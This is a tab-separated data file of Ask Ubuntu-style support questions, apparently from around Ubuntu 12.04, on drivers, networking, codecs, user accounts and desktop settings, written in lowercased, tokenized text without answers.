192813	will nvidia problematic ubuntu laptops will be fixed in 12.10 ?	first things to say ... i have a good laptop in general , but i can just now count you 30 bugs that i see everyday.. bugs that my friend with the same ubuntu 12.04 ca n't reproduce.. i have bought humble bundle 5 and 6.. 1/3 games had problem installing and could n't make them run in my ubuntu.. and the other 2/3 were lagging incredibly.. booting in windows 7 , everything perfect , all correctly installed no lags.. with this i want to say the problem is n't my laptop , is ubuntu with my laptop.. i am hearing a lot for the 12.10 at the nvidia laptops.. just used start up disk creator to make my usb bootable with 12.10 beta 1.. trying to boot it.. of course of course , my laptop with ubuntu is so buggy : / i will be sure to test beta 2 as well so my question , do you think that 12.10 may fix the ubuntu and nvidia laptops integration ?
192818	what are the applications available to monitor a user screen activity ?	is there any application available to monitor a user screen activity for ubuntu 12.04 ? preferably in hidden mode so logged in user may not be able to find out if the user screen is being monitored ( assuming the user is an average user with minimal/zero commands knowledge ) . i guess vnc is one way but i want to make sure that 's the best option .
192821	what rdp clients support nap to a windows server 2008 machine ?	i 'm trying to connect up to a windows server 2008 machine over the internet with rdp secured by nap . the remmina client does n't appear to support this . can anyone suggest a client that does ?
192824	how to switch user in gnome shell ?	i am using gnome-shell on ubuntu 12.04 . on the guest account , i have this handy option switch user , but when i am logged into my own account it is not there for some reason . why is n't it there anymore , and how can i get it back ? at the moment i can use the workaround to lock screen and i get a switch user button from there , but it would be nicer to have the menu option as i was used to .
192825	how to forward an internet connection to another network ?	can somebody please make a short & sweet tutorial telling how to forward an internet connection to different network interfaces in ubuntu ... ? this is the idea : i 'm using a 3g usb modem to get internet on my laptop , which is : ppp0 ip=10.225.174.70 my wifi device is : wlan0 mac=78 : e4:00 : d4:3d:85 these devices are determined from ifconfig command . i want to share ppp0 's internet connection with wlan0 device , so i can connect any other device to wlan0 and browse internet from that device . making a hotspot using network settings gui does n't do the trick because the other device wo n't receive internet , it just connects to wlan0 . i heard iptables can do this , but i 'm totally confused by the alien commands seen online . i 'm no expert in networking . please compose a clear & simple answer using the above devices . this is a huge annoying problem for iphone & tablet users came to ubuntu from windows .
192826	running ubuntu from a usb stick - ca n't locate any files in windows partition	i just tried running ubuntu from a usb stick and i ca n't locate any files created under xp - documents , photos , etc . ca n't even find the c : drive . am i doing something wrong ?
192832	video codec dependencies not met ?	after trying to run a .m4a and a .mp4 ( are n't they same thing ? ) i get a message saying i need to install extra codecs . when attempting to do this , i get an error window stating 'dependencies not met ' for the codecs . the error report is this : the following packages have unmet dependencies : gstreamer0.10-ffmpeg : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but < br > 4:0.8.3ubuntu0.12.04.1 is to be installed < br > depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.3-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu0.1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed gstreamer0.10-ffmpeg : i386 : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.3-0ubuntu1 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu0.1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.3ubuntu0.12.04.1 is to be installed also , when trying to install system updates to packages it comes up with a error window from 'backhand_helper.py ' says 'packaging system is broken ' and asks me to uninstall extra 3rd-party ppas . clicking details says : ` the following packages have unmet dependencies : libapt-pkg4.12 : depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is installed depends : zlib1g ( > = 1:1.2.2.3 ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed libapt-pkg4.12 : i386 : depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10 is installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is installed thanks : ) )
192833	logitech c920 camera keeps freezing	everytime using this camera it crash my system and gets unblessing freez . but when use windows it works . why ubuntu it crash and freez ? its a usb camera logitech c920 ? how can i solve this ? http : //forums.logitech.com/t5/webcams/c920-driver-for-ubuntu-versionx-fedora-versionx-or-archlinux/m-p/849876 problem is that : this camera auto mount as random /dev/video1 or video0 it creates . so my patch is creating a static /dev/video0 so that the driver auto falls into video1 edit : sep 13 , 2013 - 3.14am ( crash ) logitech c920 in ubuntu 13.04 , 13.10 with kernel 3.11 , 3.5 , 3.8 , 3.2 all tested . but none works for reliable and stable use . my system crashed several times and nobody has answer for this to fix . latest kernel 3.11 has fixed the xhbc issue which was caused by logitech c920 which floods the /var/log/syslog but problem is linux kernel disable all usb interfaces if c920 start flooding , which is more worst . i have been testing this camera since kernel 3.2 till 3.11 still no improvement . better to find another camera and forget the trust with logitech for linux compatibility .
192835	no buttons on extensions.gnome.org	there are no buttons in extensions.gnome.org website . so i am unable to download shell extensions . i have already installed gnome-shell in ubuntu 12.04 . my gnome screen looks very pale .
192841	is there a log for copied files ?	suppose someone copies a file to a dvd or pendrive . is there a log where i can see that ?
192844	volume level changes by itself	my volume level changes all by itself , without me touching physical buttons or the indicator or something at all . it usually decreases the volume every 30 seconds or so , but sometimes it mutes it completely . i can change the volume back to the old level and i get a notification bubble , just as if i was changing the volume . any ideas why ?
192847	bluetooth and wifi not working on hp probook 4430s	it is showing the bluetooth status `` on '' but when i am trying to setup new device it is not detecting any device . even my cell phone is also not detecting it . please help me with this . ubuntu 12.04 lts
192855	how to access localhost remotely - wordpress ?	i have installed a lamp stack ( sudo tasksel install lamp-server ) and wordpress ( sudo apt-get install wordpress ) , but now , i would like to access my server remotely , to be used as a home fileserver . for example , my public ip is 82.16.xxx.xxx . opening it in firefox with the suffix :8080 brings up my router config page.. ? do i have to set up port forwarding ? btw . accessing via localhost/wordpress/ works fine , i would just like to access my files while away from home .
192858	unable to install some programs due to cd/dvd prompt	when i tried to install firestarter and the gnome shell , i get the following error : cd/dvd 'ubuntu 12.04.1 lts precise pangolin - release amd64 ( 20120823.1 ) ' is required please insert the above cd/dvd into the drive '/cdrom/ ' to install software packages from it . what should i do ?
192859	ubuntu user accounts messed up	i need to fix ubuntu accounts but somehow do n't really see how it could be done . the problem is : files /etc/passwd and /etc/hostname and /etc/hosts where changed . /etc/passwd after john : x:1000:1000 : john , , , :/home/serg : /bin/bash before serg : x:1000:1000 : john , , , :/home/serg : /bin/bash /etc/hosts after 127.0.0.1 localhost 127.0.1.1 john-the-rippe before 127.0.0.1 localhost 127.0.1.1 serg-protege /etc/hostname after john-the-ripper before serg-portege-z835 i was trying to simply changed this files but can not do this because permission denied . when i 'm trying to login as a root i got this message : john @ john-the-ripper : ~ $ sudo -s [ sudo ] password for john : john is not in the sudoers file . this incident will be reported the file sudoers is empty : john @ john-the-ripper : ~ $ vi /etc/sudoers when i type users in cp : john @ john-the-ripper : ~ $ users john john when i type id , i got this : john @ john-the-ripper : ~ $ id uid=1000 ( john ) gid=1000 ( serg ) groups=1000 ( serg ) this does n't work either : john @ john-the-ripper : ~ $ usermod -l john serg usermod : user 'serg ' does not exist john @ john-the-ripper : ~ $ adduser serg adduser : only root may add a user or group to the system . ater . then i tried to go to the grub menu and from there log in as a root . i did this , but however when i tried to create user serg , it gave me an error that group already exist . when i tried to change /etc/passwd it said permission denied . and this does n't do the trick : john @ john-the-ripper : ~ $ visudo visudo : /etc/sudoers : permission denied visudo : /etc/sudoers : permission denied also the last thing i tried to do is to create a bootable usb and reinstall ubuntu , however i can not open usb-creator because it asked me a root passwordd . but it does n't work . help me please .
192863	adding executable file to path and launching from terminal directly	i just downloaded sublime text for my ubuntu , and its working fine . i have the executable file in my ~/sublime folder . now i would like to invoke this app from the terminal by just typing sublime . i suppose that is possible , pls let me know how . also , since this application did not need any configure/make/install ( i just had to extract it and then use the exec file to run the app ) , i can not add this to my gnome launcher fav apps panel . how can i put the app shortcut there , so that when i do a top-left and then type sublime , the results will show the applicaion and then i can click on it and invoke the app from there ? thanks !
192870	if ubuntu is installed along-side of windows , can it be deleted later ?	if ubuntu is installed along-side of windows , can it be uninstalled later ?
192873	toshiba satellite c850 , wlan , rtl8188ce not working	i installed ubuntu 12.04 onto a brand new toshiba satellite c850 64 bit laptop . wlan does not work , tries to connect , gives up after some time . $ windows7 works 100 % . there appears to be a problem with the driver . the actual hardware is a rtl8188ce chip . the firmware & driver loaded by ubuntu is for the rtl8192ce chip . how can i get and install a driver and firmware for ubuntu 12.04 and rtl8188ce ?
192875	do i need the ati driver or open source for dual monitor setup ( ati hd 4350 - 1gb pci-e ) in pear linux 12.04 ?	i think i covered my question in the title . right now both monitors are mirrored ( both 19 '' at 1440x900 ) . i guess what i need to know is do i need the ati proprietary driver or will the open source driver from ubuntu ( additional drivers ) work ? i want to expand the desktop between the two monitors . still finishing install and running updates now , i just wanted to gather all documentation and downloads prior to doing what is necessary . any help will be greatly appreciated .
192876	ubuntu stops recognizing my android device	i used to access my android device through nautilus , but suddenly my ubuntu stops recognizing the usb port . ( yes , i switched usb ports already ! ) i type lsusb on console but my android does n't appear anymore . there is n't any clue in dmesg or syslog . someone can help me ?
192879	color distortion with intel hd4000 over hdmi output - vga is fine	i set up a new system with i5 3570k gigabyte z77 d3h using integrated graphics ( hd4000 ) and i 've installed the 64bit desktop version of 12.04 . connected to my acer screen via hdmi , the colors are horribly distorted . i think the biggest issue is that black appears as greenish . over vga everything is fine . interestingly , i once observed that connecting both , the vga and the hdmi cable at the same time , solved the issue . ubuntu thought 2 screens were connected , i mirrored the image , and over hdmi the colors looked fine . however , after a reboot i am now unable to reproduce this behavior . i read frequently , that intel hardware should be supported out of the box by ubuntu but it does n't seem to be the case here . should i upgrade my kernel ? if so , which version would you recommend ? thank you for your answers !
192882	kubuntu with amd sempron	i want to install kubuntu on a usb stick to run on my acer aspire 1362wld laptop with an amd sempron 2800+ chip ( i think it is 32-bit ) , also running windows xp home - which iso/torrent should i use ? many thanks for this , sircharlo . after a few tries i think i am making progress , but i 'm not there yet . ( i have edited my first post , as i have n't quite got the hang of this forum yet . ) using windows i downloaded and saved kubuntu-2.04.1-desktop-i386.iso followed by universal-usb-installer-1.9.1.1.exe . i ran the latter file , entering the former at the red-letter prompt . entering bios setup , the boot option order was hard drive , floppy drive , cd rom/dvd drive and network boot . there was no option for usb drive , so i just moved hard drive from top to bottom and saved the setup . on rebooting a black screen appears with two messages : error e61 media test failure - check cable pxe mof exiting intel pxe rom this is soon replaced by a choice of windows xp and ubuntu selecting the latter , a black screen appears with error messages including something like : error prefix is not set error no such device /ubuntu/disks/root.disk error no such device /ubuntu/install/boot/grub.config this is soon replaced by a message : minimal bash-like editing is supported ... grub > [ flashing cursor ] . this is as far as it gets . have i gone wrong somewhere ? if not , do i need to try the alternative methods describes in https : //help.ubuntu.com/community/installation/fromusbstick such as the plop boot manager , or something else ?
192883	encryption and decryption during login and logoff	can you tell me that how encryption and decryption of files and folders work in linux or ubuntu 12.04 lts ? and also tell me how i can implement encryption and decryption of files and folders in ubuntu during log in and log off ?
192889	how to make window title font upper-case ?	i would like to know if it is possible to make it so that the window title font in ubuntu is always displayed as uppercase . for the font i want to use , lowercase does not look nice . thank you !
192890	emacs package without gtk	is there , in the `` regular '' debian/ubuntu repositories , a package for emacs without gtk support ? i 'm on a server and would like to install only the console version , without a dozen of unneeded graphical libs .
192893	dockbar in kubuntu 12.04 64	im looking for some dockbar like avant-window-navigator in gnome . i tried daisy but isnt found in repositories list ... i also tried installing the plasma-widget-icon-tasks . i added gnumdk/ppa repository to install it , but not found .
192897	ubuntu 12.04 lts does not download updates	i am running ubuntu 12.04 lts . update manager shows i have 89 updates available . when i click on install updates it never completes the download of the updates . i think that it never really starts the download . it just sits there with a circle spinning forever .
192909	imac with core i5 not works brightness	i have an imac 2012 with core i5 but the brightness control does n't work . the brightness works when the screen saver is activated but deos n't work with the f1 and f2 buttons . now i 'm working with an ubuntu 12.04 , how can i solve this problem ?
192911	how do i remove or inactivate certain options from the lubuntu logout screen ?	the logout screen in lubuntu 12.04 has several options . i 'd like to remove or inactivate the `` suspend '' and `` hibernate '' options . is that possible ?
192914	how run a .jar file with a double-click ?	i have a problem running .jar files by double-clicking them . when i go to the properties dialogue i ca n't find java -- only archive manager in the list of programs . but java -jar somefile.jar opens the program .
192918	how do i fix input/output error during lubuntu installation ?	i tried to install lubuntu on my pc ( pentium 4160 gb hard disk , 1256 mb ram ) . i have downloaded iso image file from torrent which is on lubuntu site , then burnt cd at 32x speed and tried to install on my pc . installation wizard successfully loaded . when it started to copy file from cd to hard drive after 2-3 minutes , it is showing a dialog-box with read input / output error . it is indicating damaged cd or the cd is not burnt at proper speed .
192922	how can i install ubuntu desktop on a htc hd2 ?	i am interested in exploring all the possibilities ubuntu desktop mobile offers . i have an htc hd2 and i am willing to experiment . how can i install it on this device do i really need a cradle or another port ( eg usb ) can be used ? thanks ! ! !
192923	ca n't login to account	thanks in advance for any help . ubuntu 12.04 up until recently my mother has been using the guest session when she logs on ; now , the guest session will not login . when i try to login to it , it bounces me back to the login screen . i then tried to login on a standard account ( alberta ) which i made prior to not being able to login to guest , and it turns out i can not login - it gives the `` invalid password '' error . so then i tried to change her password from my own account ( rory ) which is the master account . under the login options where the password option is , it says `` account disabled '' and it will not let me change this ; i try to apply a password , get no error , but it just still says `` account disabled '' . then i tried to delete the alberta account altogether , but got this error :
192924	restart/power on usb port or modem ?	i am using ubuntu 12.04 . i will explain my situation first . i am using a usb modem which frequently disconnect for an hour or so . then i will plug off it from ports and will insert again .then it will search again and connect . my idea is , is there anything i can do else without plugoff the modem from usb ports , i mean restarting powersupply to modem or usb port . one more point : i ca n't restart total usb 's power-supply because my speakers are usb and sometimes i used to work by attaching the usb devices . help me guys , if i got this then you are going to save me from an daily exercise . thank you .
192925	unable configure brightness or colors ( 12.04 )	i 've make a fresh install with ubuntu 12.04 . unfortunatly i 've a problem with colors and brightness settings . before reinstall of ubuntu , i used ubuntu 10.10 with same graphic card , and same nvidia drivers . note : only nvidia proprietary drivers works for my geforce 8600 gts . exemple : with nvidia-settings : adjust colors , brightness : no effects with xgamma -gamma 0.5 : no effects try to use f.lux or redshift : no effects i try solutions found on internet like here but no working to . any idea ?
192932	how to keep battery charge at 80 % to increase its lifespan	lithium-based batteries are not supposed to constantly sit a maximum charge . this damages them and reduces their lifespan . this is why some people take the battery out when using the laptop plugged in ; but i do n't want to do this , because then a power outage could cause data loss . on the samsung n150 netbook , there is a bios setup option to set the max battery charge level to 80 % . then you can leave the netbook plugged in , with the battery installed , and still preserve the battery 's lifespan . i want to do it with my hp g42-230br laptop , which does not have such a bios setup option . it should still be possible with software , right ? i have googled and did not found how to do it : https : //www.google.com/search ? q=ubuntu|linux+partial+charge|recharge+battery+life do you know how to do it ? thank you very much for your attention
192935	my machine 's information	is there a way to know what are the packages installed on my machine , detailed information , like each software and its version ? like to know if i have qt installed and what version , or gcc and what version . thanks
192937	wireless connected , ip fetched , but no browsing	i 'm using 12.04 on an acer 722 , and just after i 've installed mesa drivers to use open source graphics drivers , the wireless connection stopped working . as soon as i 've removed bcm sta drivers , the adapter came back to life , finds my router , connects , fetches an ip address from the dhcp server ( mikrotik ) but no browsing . on terminal , i 've ping 'd my router ( 192.168.88.1 ) and after a good amount of time , it starts answering `` unreachable '' . through cable everything seems fine . other devices run fine under this same network ( as this same netbook did before with the sta drivers ) . is there a way i can run the previous driver ( it fails with blacklist error on jockey log , even after i 've put an # mark before the blacklist marking on the blacklist file ) or are there any other options ? update : yes , everything comes out fine from the dhcp server . when i try to ping the provided address from another station , it goes `` unreachable '' . ( that also happens after a good amount of time on the netbook , updated above ) setting all the ipv4 info manually , the same occurs . the addresses are on the accordingly range . i 've posted the question as `` last resort '' since i 've tried everything that i could found on web so far , even issues that were n't like mine but involved similar hardware . with ati'ĺ proprietary graphics driver from amd website i did not have such issues , since the sta driver worked flawlessly . but once mesa drivers were installed , i ca n't enable it anymore . i 'd rather stick with the open source drivers , because the overall machine seems to run faster and there are no hibernation issues .
192946	pulseaudio and alsa on ubuntu 12.04 server	i am running ubuntu 12.04server , and trying to get pulseaudio working . i followed the instructions at how do i run pulseaudio in a headless server installation ? at the moment , pacmd list-cards is reporting 0 cards , aplay will only playing sound when i run it as sudo , and running alsamixer as sudo also works , but running it as my user produces `` can not open mixer : no such file or directory '' as far as i can tell , this means the the kernel module for my sound card is in fact loaded . i have already tried adding my user to the `` audio '' group , but this does not help . the permissions on the devices in /dev/snd are all crw-rw -- -t 1 root audio 116 i noticed on an ubuntu 12.04 desktop , that the file permissions are slightly different . on the desktop , they are crw-rw -- -t+ 1 root audio 116 my questions are 1 ) how do i get aplay to work without running it as sudo on the server 2 ) is there anything special i need to do to make pulseaudio work at this point .
192951	how can i install and use oblogout ?	oblogout is a expandable , configurable , and theme-able logout script designed to be used in a openbox desktop environment . this was taken from their launchpad page , it was created to be used in crunchabng linux and i can find packages for arch , fedora and debian but no information on how to install it in ubuntu , i ca n't find it in the repositories either and the only ppa is 3 years old . how can i install it and is there a possibility that it could work in other environments other than openbox ?
192952	is it possible to use the volume notifications from gnome shell in xfce ?	i somehow had them working before in 11.10 but i do n't really remember what did i do back then other than activating `` load gnome components on start up '' in the xfce 's settings manager . i 've tried the same in 12.04 but does n't seem to do anything , i specifically ask for the volume notifications as other notifications used notify-osd or xfce4-notifyd but the volume one was gnome 's ( i found that later ) as far as i know it uses notification-daemonbut installing it instead of the other two does n't give me the correct notifications . i 'm using xfce 4.10 this is what i get from running gnome-settings-daemon in the terminal . ( gnome-settings-daemon:3841 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1137:14 : not using units is deprecated . assuming 'px ' . ** ( gnome-settings-daemon:3841 ) : warning ** : you can only run one xsettings manager at a time ; exiting ** ( gnome-settings-daemon:3841 ) : warning ** : unable to start xsettings manager : could not initialize xsettings manager . ** ( process:3849 ) : warning ** : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ** ( gnome-settings-daemon:3841 ) : warning ** : unable to register client : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ** ( gnome-settings-daemon:3841 ) : warning ** : name taken or bus went away - shutting down
192953	screen/text corruption	ubuntu always starts fine for me but after a while the text will start to corrupt to the point i can not read it in the applications i am running and the purple background is pixelated into big squares . obviously i can read the text on the browser but the text is corrupt in and from the url and google windows up .
192955	how can i edit the color of search bar in nautilus gtk3 ?	i want to change search bar in nautilus to purple but i do n't know how this is my first theme still do n't know my way around . here is a example
192957	how to enable in chrome icedtea7 java plugin instead of icedtea6 ?	my chrome browser in ubuntu 12.04 uses iced6 plugin . test http : //java.com/en/download/testjava.jsp shows java6 , but via update-alternatives i switched java/javac to using openjdk-java7
192959	how to disable three finger gestures on touchpad ?	i am using 12.04 on a macbook pro . everything works really well , except ... i want to disable 3 finger gestures . it is way to easy to accidentally drag/move a window ( 3 finger gesture ) while scrolling ( 2 finger gesture ) when using a touchpad . i found this answer on ask ubuntu . it was marked answered but it is not . the functionality is still there . all this recommendation does is disable the drag marks on the window . this may be tricky because i want to disable 3 finger gestures but not 2 finger gestures . ( ie i do n't want to disable touchpad gestures all together )
192963	how to show java-openjdk7 console during applet startup in chrome/firefox ?	i 've just installed java-openjdk-7 and in icedtea control panel enable debugging/java console/show but it wo n't help .
192969	some applications is not working after upgrading from ubuntu 11.04 32 bit to ubuntu 12.04 64 bit	i updated my system from ubuntu 11.10 32-bit to ubuntu 12.04 64-bit using installation dvd . i used option 'update older installation of ubuntu 11.10 ' . now my softwares and settings pre-installed before update are not recovered within update setup . they are still stored on my hard disk but i ca n't use them as i used to earlier . how can i recover my older installed softwares and settings .
192973	will unity 6.2 be available for ubuntu 12.04 ?	i was wondering if unity 6.2 will be available anytime soon for ubuntu 12.04 ?
192975	networking- wireless and wired not working	so everything in ubuntu has been working great until networking stopped working . i 've spent the better part of two days scouring for a fix with no luck . here is my info ... your help would so be appreciated . grep -i eth /var/log/syslog | tail sep 25 16:31:59 jj-laptop networkmanager [ 970 ] : < info > ( eth0 ) : cleaning up ... sep 25 16:31:59 jj-laptop networkmanager [ 970 ] : < info > ( eth0 ) : taking down device . sep 25 16:31:59 jj-laptop kernel : [ 23403.998837 ] sky2 0000:02:00.0 : eth0 : disabling interface sep 25 16:35:54 jj-laptop networkmanager [ 970 ] : < info > ( eth0 ) : now managed sep 25 16:35:54 jj-laptop networkmanager [ 970 ] : < info > ( eth0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] sep 25 16:35:54 jj-laptop networkmanager [ 970 ] : < info > ( eth0 ) : bringing up device . sep 25 16:35:54 jj-laptop kernel : [ 23413.629424 ] sky2 0000:02:00.0 : eth0 : enabling interface sep 25 16:35:54 jj-laptop kernel : [ 23413.635703 ] addrconf ( netdev_up ) : eth0 : link is not ready sep 25 16:35:54 jj-laptop networkmanager [ 970 ] : < info > ( eth0 ) : preparing device . sep 25 16:35:54 jj-laptop networkmanager [ 970 ] : < info > ( eth0 ) : deactivating device ( reason 'managed ' ) [ 2 ] and then ifconfig -a eth0 link encap : ethernet hwaddr 00:17:42:14 : e9 : e1 up broadcast multicast mtu:1500 metric:1 rx packets:4605 errors:0 dropped:0 overruns:0 frame:0 tx packets:287 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:315161 ( 315.1 kb ) tx bytes:63680 ( 63.6 kb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:13018 errors:0 dropped:0 overruns:0 frame:0 tx packets:13018 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:880484 ( 880.4 kb ) tx bytes:880484 ( 880.4 kb ) wlan0 link encap : ethernet hwaddr 00:13:02 : d0 : ee:13 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) also iwconfig lo no wireless extensions . wlan0 ieee 802.11abg essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : on eth0 no wireless extensions . and of course sudo lshw -c network *-network description : ethernet interface product : 88e8055 pci-e gigabit ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 12 serial : 00:17:42:14 : e9 : e1 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 duplex=full firmware=n/a latency=0 link=no multicast=yes port=twisted pair speed=1gbit/s resources : irq:44 memory : f0000000-f0003fff ioport:2000 ( size=256 ) memory : c0a00000-c0a1ffff *-network disabled description : wireless interface product : pro/wireless 3945abg [ golan ] network connection vendor : intel corporation physical id : 0 bus info : pci @ 0000:05:00.0 logical name : wlan0 version : 02 serial : 00:13:02 : d0 : ee:13 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwl3945 driverversion=3.2.0-31-generic firmware=15.32.2.9 latency=0 link=no multicast=yes wireless=ieee 802.11abg resources : irq:45 memory : c0100000-c0100fff last but not least lsmod module size used by nls_iso8859_1 12617 0 nls_cp437 12751 0 vfat 17308 0 fat 55605 1 vfat usb_storage 39646 0 uas 17828 0 dm_crypt 22528 0 rfcomm 38139 0 parport_pc 32114 0 bnep 17830 2 ppdev 12849 0 bluetooth 158438 10 rfcomm , bnep binfmt_misc 17292 1 snd_hda_codec_idt 60251 1 pcmcia 39791 0 joydev 17393 0 snd_hda_intel 32765 3 snd_hda_codec 109562 2 snd_hda_codec_idt , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80845 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 yenta_socket 27428 0 snd_rawmidi 25424 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event pcmcia_rsrc 18367 1 yenta_socket wacom_w8001 12906 0 irda 185517 0 arc4 12473 2 iwl3945 73111 0 iwl_legacy 71134 1 iwl3945 mac80211 436455 2 iwl3945 , iwl_legacy cfg80211 178679 3 iwl3945 , iwl_legacy , mac80211 snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq dm_multipath 22710 0 pcmcia_core 21511 3 pcmcia , yenta_socket , pcmcia_rsrc psmouse 96619 0 apanel 12718 0 serport 12808 1 serio_raw 13027 0 crc_ccitt 12595 1 irda mac_hid 13077 0 snd 62064 15 snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_t imer , snd_seq_device input_polldev 13648 1 apanel soundcore 14635 1 snd snd_page_alloc 14115 2 snd_hda_intel , snd_pcm lp 17455 0 fujitsu_laptop 18504 0 parport 40930 3 parport_pc , ppdev , lp dm_raid45 76451 0 xor 25987 1 dm_raid45 dm_mirror 21822 0 dm_region_hash 16065 1 dm_mirror dm_log 18193 3 dm_raid45 , dm_mirror , dm_region_hash sdhci_pci 18324 0 sdhci 28241 1 sdhci_pci sky2 49545 0 i915 414939 3 drm_kms_helper 45466 1 i915 drm 197692 4 i915 , drm_kms_helper i2c_algo_bit 13199 1 i915 video 19068 1 i915
192980	switching from 32 to 64 bit via upgrade	i was quite sure myself that it 's not possible to switch from a 32-bit to a 64-bit ubuntu without a clean re-install , and of course there is a popular question titled is it possible to âupgradeâ from a 32bit to a 64bit installation ? , answers to which unanimously suggest that the easiest way is to do a clean re-install . then i saw this question , where the op says they upgraded from ubuntu 11.10 ( 32 bit ) to ubuntu 12.04 ( 64 bit ) by booting from a livecd and choosing `` upgrade existing installation of ubuntu '' , an option which as i remember only appeared in recent versions of ubuntu installer . i realized that there 's nothing which would in theory prevent a successful upgrade this way - the system is `` offline '' , my understanding is that the installer simply removes everything from the root partition leaving only /home/ and installs new binaries , kernel and everything . so it looks it should be possible to switch from 32 bit to 64 bit ( and even from 64 bit to 32 bit ) using this procedure . so the question is : where is the catch ? why is it not the recommended way to switch between 32 and 64-bit architectures ?
192986	why does whoopsie increasingly take more cpu ?	i am running ubuntu 12.04 lts and i 've been following whoopsie with the top program and noticed something strange . in the afternoon the daemon process was only using up to 2 % of cpu power . but during the evening this slowly increased to sometimes taking up to 40 % of cpu power . i am running a 10 year old machine , but even vlc which is normally running ok was having problems running smoothly due to this increase in usage . since i am running an old machine , should i just switch whoopsie off ( as descrribed in what is the 'whoopsie ' process and how can i remove it ? ) or is there a way to let whoopsie behave less cpu hungry ?
192987	how do i switch channel in me tv ?	i 've got my usb dvb-t antenna up & running . also i 've got me tv installed , and i can watch a channel . my problem is that i do n't know how to ( supposing here it is possible ) change channels : i do n't see any buttons to do so , and the arrow keys do n't work either . me tv did find several channels , though , so i should be able to watch them .
192991	my hard drive not detected by installer on an eee pc 1000he	i have a eee pc 1000he with a formatted clean hard drive . the installer can not see my hard drive and the partitioner is empty and there is no drives at all .
